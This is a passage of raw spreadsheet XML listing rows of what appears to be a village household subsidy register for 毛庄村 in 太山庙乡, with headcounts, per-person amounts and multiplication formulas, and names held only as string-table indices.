      <c r="A2164" s="23" t="s">
        <v>5716</v>
      </c>
      <c r="B2164" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2164" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2164" s="24" t="s">
        <v>5717</v>
      </c>
      <c r="E2164" s="24" t="s">
        <v>5460</v>
      </c>
      <c r="F2164" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2164" s="24">
        <v>1</v>
      </c>
      <c r="H2164" s="25">
        <v>365</v>
      </c>
      <c r="I2164" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2164" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2164" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2165" customHeight="1" spans="1:11">
      <c r="A2165" s="23" t="s">
        <v>5718</v>
      </c>
      <c r="B2165" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2165" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2165" s="24" t="s">
        <v>5719</v>
      </c>
      <c r="E2165" s="24" t="s">
        <v>5460</v>
      </c>
      <c r="F2165" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2165" s="24">
        <v>2</v>
      </c>
      <c r="H2165" s="25">
        <v>325</v>
      </c>
      <c r="I2165" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2165" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2165" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2166" customHeight="1" spans="1:11">
      <c r="A2166" s="23" t="s">
        <v>5720</v>
      </c>
      <c r="B2166" s="24" t="str">
        <f>B2165</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2166" s="24" t="str">
        <f>C2165</f>
        <v>毛庄村</v>
      </c>
      <c r="D2166" s="23" t="s">
        <v>5721</v>
      </c>
      <c r="E2166" s="23" t="s">
        <v>5504</v>
      </c>
      <c r="F2166" s="24">
        <f>F2165</f>
        <v>4113210704</v>
      </c>
      <c r="G2166" s="24"/>
      <c r="H2166" s="24"/>
      <c r="I2166" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2166" s="24"/>
      <c r="K2166" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2167" customHeight="1" spans="1:11">
      <c r="A2167" s="23" t="s">
        <v>5722</v>
      </c>
      <c r="B2167" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2167" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2167" s="24" t="s">
        <v>5723</v>
      </c>
      <c r="E2167" s="24" t="s">
        <v>5479</v>
      </c>
      <c r="F2167" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2167" s="24">
        <v>2</v>
      </c>
      <c r="H2167" s="25">
        <v>325</v>
      </c>
      <c r="I2167" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2167" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2167" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2168" customHeight="1" spans="1:11">
      <c r="A2168" s="23" t="s">
        <v>5724</v>
      </c>
      <c r="B2168" s="24" t="str">
        <f>B2167</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2168" s="24" t="str">
        <f>C2167</f>
        <v>毛庄村</v>
      </c>
      <c r="D2168" s="23" t="s">
        <v>5725</v>
      </c>
      <c r="E2168" s="23" t="s">
        <v>5726</v>
      </c>
      <c r="F2168" s="24">
        <f>F2167</f>
        <v>4113210704</v>
      </c>
      <c r="G2168" s="24"/>
      <c r="H2168" s="24"/>
      <c r="I2168" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2168" s="24"/>
      <c r="K2168" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2169" customHeight="1" spans="1:11">
      <c r="A2169" s="23" t="s">
        <v>5727</v>
      </c>
      <c r="B2169" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2169" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2169" s="24" t="s">
        <v>5728</v>
      </c>
      <c r="E2169" s="24" t="s">
        <v>5729</v>
      </c>
      <c r="F2169" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2169" s="24">
        <v>1</v>
      </c>
      <c r="H2169" s="25">
        <v>365</v>
      </c>
      <c r="I2169" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2169" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2169" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2170" customHeight="1" spans="1:11">
      <c r="A2170" s="23" t="s">
        <v>5730</v>
      </c>
      <c r="B2170" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2170" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2170" s="24" t="s">
        <v>5731</v>
      </c>
      <c r="E2170" s="24" t="s">
        <v>3472</v>
      </c>
      <c r="F2170" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2170" s="24">
        <v>1</v>
      </c>
      <c r="H2170" s="25">
        <v>365</v>
      </c>
      <c r="I2170" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2170" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2170" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2171" customHeight="1" spans="1:11">
      <c r="A2171" s="23" t="s">
        <v>5732</v>
      </c>
      <c r="B2171" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2171" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2171" s="24" t="s">
        <v>5733</v>
      </c>
      <c r="E2171" s="24" t="s">
        <v>5734</v>
      </c>
      <c r="F2171" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2171" s="24">
        <v>1</v>
      </c>
      <c r="H2171" s="25">
        <v>365</v>
      </c>
      <c r="I2171" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2171" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2171" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2172" customHeight="1" spans="1:11">
      <c r="A2172" s="23" t="s">
        <v>5735</v>
      </c>
      <c r="B2172" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2172" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2172" s="24" t="s">
        <v>5485</v>
      </c>
      <c r="E2172" s="24" t="s">
        <v>5486</v>
      </c>
      <c r="F2172" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2172" s="24">
        <v>1</v>
      </c>
      <c r="H2172" s="25">
        <v>365</v>
      </c>
      <c r="I2172" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2172" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2172" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2173" customHeight="1" spans="1:11">
      <c r="A2173" s="23" t="s">
        <v>5736</v>
      </c>
      <c r="B2173" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2173" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2173" s="24" t="s">
        <v>5737</v>
      </c>
      <c r="E2173" s="24" t="s">
        <v>5453</v>
      </c>
      <c r="F2173" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2173" s="24">
        <v>1</v>
      </c>
      <c r="H2173" s="25">
        <v>365</v>
      </c>
      <c r="I2173" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2173" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2173" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2174" customHeight="1" spans="1:11">
      <c r="A2174" s="23" t="s">
        <v>5738</v>
      </c>
      <c r="B2174" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2174" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2174" s="24" t="s">
        <v>5739</v>
      </c>
      <c r="E2174" s="24" t="s">
        <v>5610</v>
      </c>
      <c r="F2174" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2174" s="24">
        <v>2</v>
      </c>
      <c r="H2174" s="25">
        <v>325</v>
      </c>
      <c r="I2174" s="24">
        <f t="shared" si="33"/>
        <v>650</v>
      </c>
      <c r="J2174" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2174" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2175" customHeight="1" spans="1:11">
      <c r="A2175" s="23" t="s">
        <v>5740</v>
      </c>
      <c r="B2175" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2175" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2175" s="24" t="s">
        <v>5741</v>
      </c>
      <c r="E2175" s="24" t="s">
        <v>5467</v>
      </c>
      <c r="F2175" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2175" s="24"/>
      <c r="I2175" s="24">
        <f t="shared" si="33"/>
        <v>0</v>
      </c>
      <c r="J2175" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2175" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2176" customHeight="1" spans="1:11">
      <c r="A2176" s="23" t="s">
        <v>5742</v>
      </c>
      <c r="B2176" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2176" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2176" s="24" t="s">
        <v>5743</v>
      </c>
      <c r="E2176" s="24" t="s">
        <v>3912</v>
      </c>
      <c r="F2176" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2176" s="24">
        <v>1</v>
      </c>
      <c r="H2176" s="25">
        <v>365</v>
      </c>
      <c r="I2176" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2176" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2176" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2177" customHeight="1" spans="1:11">
      <c r="A2177" s="23" t="s">
        <v>5744</v>
      </c>
      <c r="B2177" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2177" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2177" s="24" t="s">
        <v>5745</v>
      </c>
      <c r="E2177" s="24" t="s">
        <v>5385</v>
      </c>
      <c r="F2177" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2177" s="24">
        <v>1</v>
      </c>
      <c r="H2177" s="25">
        <v>365</v>
      </c>
      <c r="I2177" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2177" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2177" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2178" customHeight="1" spans="1:11">
      <c r="A2178" s="23" t="s">
        <v>5746</v>
      </c>
      <c r="B2178" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2178" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2178" s="24" t="s">
        <v>5747</v>
      </c>
      <c r="E2178" s="24" t="s">
        <v>5380</v>
      </c>
      <c r="F2178" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2178" s="24">
        <v>1</v>
      </c>
      <c r="H2178" s="25">
        <v>365</v>
      </c>
      <c r="I2178" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2178" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2178" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2179" customHeight="1" spans="1:11">
      <c r="A2179" s="23" t="s">
        <v>5748</v>
      </c>
      <c r="B2179" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2179" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2179" s="24" t="s">
        <v>5749</v>
      </c>
      <c r="E2179" s="24" t="s">
        <v>5479</v>
      </c>
      <c r="F2179" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2179" s="24">
        <v>1</v>
      </c>
      <c r="H2179" s="25">
        <v>365</v>
      </c>
      <c r="I2179" s="24">
        <f t="shared" si="33"/>
        <v>365</v>
      </c>
      <c r="J2179" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2179" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2180" customHeight="1" spans="1:11">
      <c r="A2180" s="23" t="s">
        <v>5750</v>
      </c>
      <c r="B2180" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2180" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2180" s="24" t="s">
        <v>5751</v>
      </c>
      <c r="E2180" s="24" t="s">
        <v>5752</v>
      </c>
      <c r="F2180" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2180" s="24">
        <v>1</v>
      </c>
      <c r="H2180" s="25">
        <v>365</v>
      </c>
      <c r="I2180" s="24">
        <f t="shared" ref="I2180:I2243" si="34">H2180*G2180</f>
        <v>365</v>
      </c>
      <c r="J2180" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2180" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2181" customHeight="1" spans="1:11">
      <c r="A2181" s="23" t="s">
        <v>5753</v>
      </c>
      <c r="B2181" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2181" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2181" s="24" t="s">
        <v>5754</v>
      </c>
      <c r="E2181" s="24" t="s">
        <v>5755</v>
      </c>
      <c r="F2181" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2181" s="24">
        <v>2</v>
      </c>
      <c r="H2181" s="25">
        <v>325</v>
      </c>
      <c r="I2181" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2181" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2181" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2182" customHeight="1" spans="1:11">
      <c r="A2182" s="23" t="s">
        <v>5756</v>
      </c>
      <c r="B2182" s="24" t="str">
        <f>B2181</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2182" s="24" t="str">
        <f>C2181</f>
        <v>毛庄村</v>
      </c>
      <c r="D2182" s="23" t="s">
        <v>5757</v>
      </c>
      <c r="E2182" s="23" t="s">
        <v>5610</v>
      </c>
      <c r="F2182" s="24">
        <f>F2181</f>
        <v>4113210704</v>
      </c>
      <c r="G2182" s="24"/>
      <c r="H2182" s="24"/>
      <c r="I2182" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2182" s="24"/>
      <c r="K2182" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2183" customHeight="1" spans="1:11">
      <c r="A2183" s="23" t="s">
        <v>5758</v>
      </c>
      <c r="B2183" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2183" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2183" s="24" t="s">
        <v>5759</v>
      </c>
      <c r="E2183" s="24" t="s">
        <v>5523</v>
      </c>
      <c r="F2183" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2183" s="24">
        <v>2</v>
      </c>
      <c r="H2183" s="25">
        <v>325</v>
      </c>
      <c r="I2183" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2183" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2183" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2184" customHeight="1" spans="1:11">
      <c r="A2184" s="23" t="s">
        <v>5760</v>
      </c>
      <c r="B2184" s="24" t="str">
        <f>B2183</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2184" s="24" t="str">
        <f>C2183</f>
        <v>毛庄村</v>
      </c>
      <c r="D2184" s="23" t="s">
        <v>5761</v>
      </c>
      <c r="E2184" s="23" t="s">
        <v>5414</v>
      </c>
      <c r="F2184" s="24">
        <f>F2183</f>
        <v>4113210704</v>
      </c>
      <c r="G2184" s="24"/>
      <c r="H2184" s="24"/>
      <c r="I2184" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2184" s="24"/>
      <c r="K2184" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2185" customHeight="1" spans="1:11">
      <c r="A2185" s="23" t="s">
        <v>5762</v>
      </c>
      <c r="B2185" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2185" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2185" s="24" t="s">
        <v>5763</v>
      </c>
      <c r="E2185" s="24" t="s">
        <v>5467</v>
      </c>
      <c r="F2185" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2185" s="24">
        <v>1</v>
      </c>
      <c r="H2185" s="25">
        <v>365</v>
      </c>
      <c r="I2185" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2185" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2185" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2186" customHeight="1" spans="1:11">
      <c r="A2186" s="23" t="s">
        <v>5764</v>
      </c>
      <c r="B2186" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2186" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2186" s="24" t="s">
        <v>5765</v>
      </c>
      <c r="E2186" s="24" t="s">
        <v>5766</v>
      </c>
      <c r="F2186" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2186" s="24">
        <v>1</v>
      </c>
      <c r="H2186" s="25">
        <v>365</v>
      </c>
      <c r="I2186" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2186" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2186" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2187" customHeight="1" spans="1:11">
      <c r="A2187" s="23" t="s">
        <v>5767</v>
      </c>
      <c r="B2187" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2187" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2187" s="24" t="s">
        <v>5768</v>
      </c>
      <c r="E2187" s="24" t="s">
        <v>5504</v>
      </c>
      <c r="F2187" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2187" s="24">
        <v>2</v>
      </c>
      <c r="H2187" s="25">
        <v>325</v>
      </c>
      <c r="I2187" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2187" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2187" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2188" customHeight="1" spans="1:11">
      <c r="A2188" s="23" t="s">
        <v>5769</v>
      </c>
      <c r="B2188" s="24" t="str">
        <f>B2187</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2188" s="24" t="str">
        <f>C2187</f>
        <v>毛庄村</v>
      </c>
      <c r="D2188" s="23" t="s">
        <v>5770</v>
      </c>
      <c r="E2188" s="23" t="s">
        <v>5771</v>
      </c>
      <c r="F2188" s="24">
        <f>F2187</f>
        <v>4113210704</v>
      </c>
      <c r="G2188" s="24"/>
      <c r="H2188" s="24"/>
      <c r="I2188" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2188" s="24"/>
      <c r="K2188" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2189" customHeight="1" spans="1:11">
      <c r="A2189" s="23" t="s">
        <v>5772</v>
      </c>
      <c r="B2189" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2189" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2189" s="24" t="s">
        <v>5773</v>
      </c>
      <c r="E2189" s="24" t="s">
        <v>5467</v>
      </c>
      <c r="F2189" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2189" s="24">
        <v>1</v>
      </c>
      <c r="H2189" s="25">
        <v>365</v>
      </c>
      <c r="I2189" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2189" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2189" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2190" customHeight="1" spans="1:11">
      <c r="A2190" s="23" t="s">
        <v>5774</v>
      </c>
      <c r="B2190" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2190" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2190" s="24" t="s">
        <v>5775</v>
      </c>
      <c r="E2190" s="24" t="s">
        <v>5646</v>
      </c>
      <c r="F2190" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2190" s="24">
        <v>1</v>
      </c>
      <c r="H2190" s="25">
        <v>365</v>
      </c>
      <c r="I2190" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2190" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2190" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2191" customHeight="1" spans="1:11">
      <c r="A2191" s="23" t="s">
        <v>5776</v>
      </c>
      <c r="B2191" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2191" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2191" s="24" t="s">
        <v>5777</v>
      </c>
      <c r="E2191" s="24" t="s">
        <v>3510</v>
      </c>
      <c r="F2191" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2191" s="24">
        <v>1</v>
      </c>
      <c r="H2191" s="25">
        <v>365</v>
      </c>
      <c r="I2191" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2191" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2191" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2192" customHeight="1" spans="1:11">
      <c r="A2192" s="23" t="s">
        <v>5778</v>
      </c>
      <c r="B2192" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2192" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="D2192" s="24" t="s">
        <v>5779</v>
      </c>
      <c r="E2192" s="24" t="s">
        <v>4060</v>
      </c>
      <c r="F2192" s="24" t="s">
        <v>5603</v>
      </c>
      <c r="G2192" s="24">
        <v>3</v>
      </c>
      <c r="H2192" s="25">
        <v>290</v>
      </c>
      <c r="I2192" s="24">
        <f t="shared" si="34"/>
        <v>870</v>
      </c>
      <c r="J2192" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2192" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2193" customHeight="1" spans="1:11">
      <c r="A2193" s="23" t="s">
        <v>5780</v>
      </c>
      <c r="B2193" s="24" t="str">
        <f>B2192</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2193" s="24" t="str">
        <f>C2192</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2193" s="30" t="s">
        <v>5781</v>
      </c>
      <c r="E2193" s="30" t="s">
        <v>5782</v>
      </c>
      <c r="F2193" s="24" t="str">
        <f>F2192</f>
        <v>4113210705</v>
      </c>
      <c r="G2193" s="24"/>
      <c r="H2193" s="24"/>
      <c r="I2193" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2193" s="24"/>
      <c r="K2193" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2194" customHeight="1" spans="1:11">
      <c r="A2194" s="23" t="s">
        <v>5783</v>
      </c>
      <c r="B2194" s="24" t="str">
        <f>B2193</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2194" s="24" t="str">
        <f>C2193</f>
        <v>太山庙乡</v>
      </c>
      <c r="D2194" s="23" t="s">
        <v>5784</v>
      </c>
      <c r="E2194" s="23" t="s">
        <v>5785</v>
      </c>
      <c r="F2194" s="24" t="str">
        <f>F2193</f>
        <v>4113210705</v>
      </c>
      <c r="G2194" s="24"/>
      <c r="H2194" s="24"/>
      <c r="I2194" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2194" s="24"/>
      <c r="K2194" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2195" customHeight="1" spans="1:11">
      <c r="A2195" s="23" t="s">
        <v>5786</v>
      </c>
      <c r="B2195" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2195" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2195" s="24" t="s">
        <v>1597</v>
      </c>
      <c r="E2195" s="24" t="s">
        <v>5419</v>
      </c>
      <c r="F2195" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2195" s="24">
        <v>2</v>
      </c>
      <c r="H2195" s="25">
        <v>325</v>
      </c>
      <c r="I2195" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2195" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2195" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2196" customHeight="1" spans="1:11">
      <c r="A2196" s="23" t="s">
        <v>5787</v>
      </c>
      <c r="B2196" s="24" t="str">
        <f>B2195</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2196" s="24" t="str">
        <f>C2195</f>
        <v>毛庄村</v>
      </c>
      <c r="D2196" s="23" t="s">
        <v>5788</v>
      </c>
      <c r="E2196" s="23" t="s">
        <v>5789</v>
      </c>
      <c r="F2196" s="24">
        <f>F2195</f>
        <v>4113210704</v>
      </c>
      <c r="G2196" s="24"/>
      <c r="H2196" s="24"/>
      <c r="I2196" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2196" s="24"/>
      <c r="K2196" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2197" customHeight="1" spans="1:11">
      <c r="A2197" s="23" t="s">
        <v>5790</v>
      </c>
      <c r="B2197" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2197" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2197" s="24" t="s">
        <v>5791</v>
      </c>
      <c r="E2197" s="24" t="s">
        <v>5549</v>
      </c>
      <c r="F2197" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2197" s="24">
        <v>2</v>
      </c>
      <c r="H2197" s="25">
        <v>325</v>
      </c>
      <c r="I2197" s="24">
        <f t="shared" si="34"/>
        <v>650</v>
      </c>
      <c r="J2197" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2197" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2198" customHeight="1" spans="1:11">
      <c r="A2198" s="23" t="s">
        <v>5792</v>
      </c>
      <c r="B2198" s="24" t="str">
        <f>B2197</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2198" s="24" t="str">
        <f>C2197</f>
        <v>毛庄村</v>
      </c>
      <c r="D2198" s="24" t="s">
        <v>5793</v>
      </c>
      <c r="E2198" s="24" t="s">
        <v>5794</v>
      </c>
      <c r="F2198" s="24">
        <f>F2197</f>
        <v>4113210704</v>
      </c>
      <c r="G2198" s="24"/>
      <c r="H2198" s="24"/>
      <c r="I2198" s="24">
        <f t="shared" si="34"/>
        <v>0</v>
      </c>
      <c r="J2198" s="24"/>
      <c r="K2198" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2199" customHeight="1" spans="1:11">
      <c r="A2199" s="23" t="s">
        <v>5795</v>
      </c>
      <c r="B2199" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2199" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2199" s="24" t="s">
        <v>5796</v>
      </c>
      <c r="E2199" s="24" t="s">
        <v>5649</v>
      </c>
      <c r="F2199" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2199" s="24">
        <v>1</v>
      </c>
      <c r="H2199" s="25">
        <v>365</v>
      </c>
      <c r="I2199" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2199" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2199" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2200" customHeight="1" spans="1:11">
      <c r="A2200" s="23" t="s">
        <v>5797</v>
      </c>
      <c r="B2200" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2200" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2200" s="24" t="s">
        <v>5798</v>
      </c>
      <c r="E2200" s="24" t="s">
        <v>5799</v>
      </c>
      <c r="F2200" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2200" s="24">
        <v>1</v>
      </c>
      <c r="H2200" s="25">
        <v>365</v>
      </c>
      <c r="I2200" s="24">
        <f t="shared" si="34"/>
        <v>365</v>
      </c>
      <c r="J2200" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2200" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2201" customHeight="1" spans="1:11">
      <c r="A2201" s="23" t="s">
        <v>5800</v>
      </c>
      <c r="B2201" s="24" t="s">
        <v>5352</v>
      </c>
      <c r="C2201" s="24" t="s">
        <v>5353</v>
      </c>
      <c r="D2201" s="24" t="s">
        <v>5801</v>
      </c>
      <c r="E2201" s="24" t="s">
        <v>5374</v>
      </c>
      <c r="F2201" s="24">
        <v>4113210704</v>
      </c>
      <c r="G2201" s="24">
        <v>2</v>
      </c>
      <c r="H2201" s="24">
        <v>550</v>
      </c>
      <c r="I2201" s="24">
        <f t="shared" si="34"/>
        <v>1100</v>
      </c>
      <c r="J2201" s="24" t="s">
        <v>224</v>
      </c>
      <c r="K2201" s="24" t="s">
        <v>225</v>
      </c>
    </row>
    <row r="2202" customHeight="1" spans="1:11">
      <c r="A2202" s="23" t="s">
        <v>5802</v>
      </c>
      <c r="B2202" s="24" t="str">
        <f>B2201</f>
        <v>太山庙乡</v>
      </c>
      <c r="C2202" s="24" t="str">
        <f>C2201</f>
        <v>毛庄村</v>
      </c>
      <c r="D2202" s="23" t="s">
        <v>5803</v>
      </c>
      <c r="E2202" s="23" t="s">
        <v>5804</v>
      </c>
      <c r="F2202" s="24">
        <f>F2201</f>
        <v>4113210704</v>
      </c>
      <c r="G2202" s="24"/>
      <c r="H2202" s="24"/>
      <c r="I2202" s="24">
        <f t="shared" si="34"/>
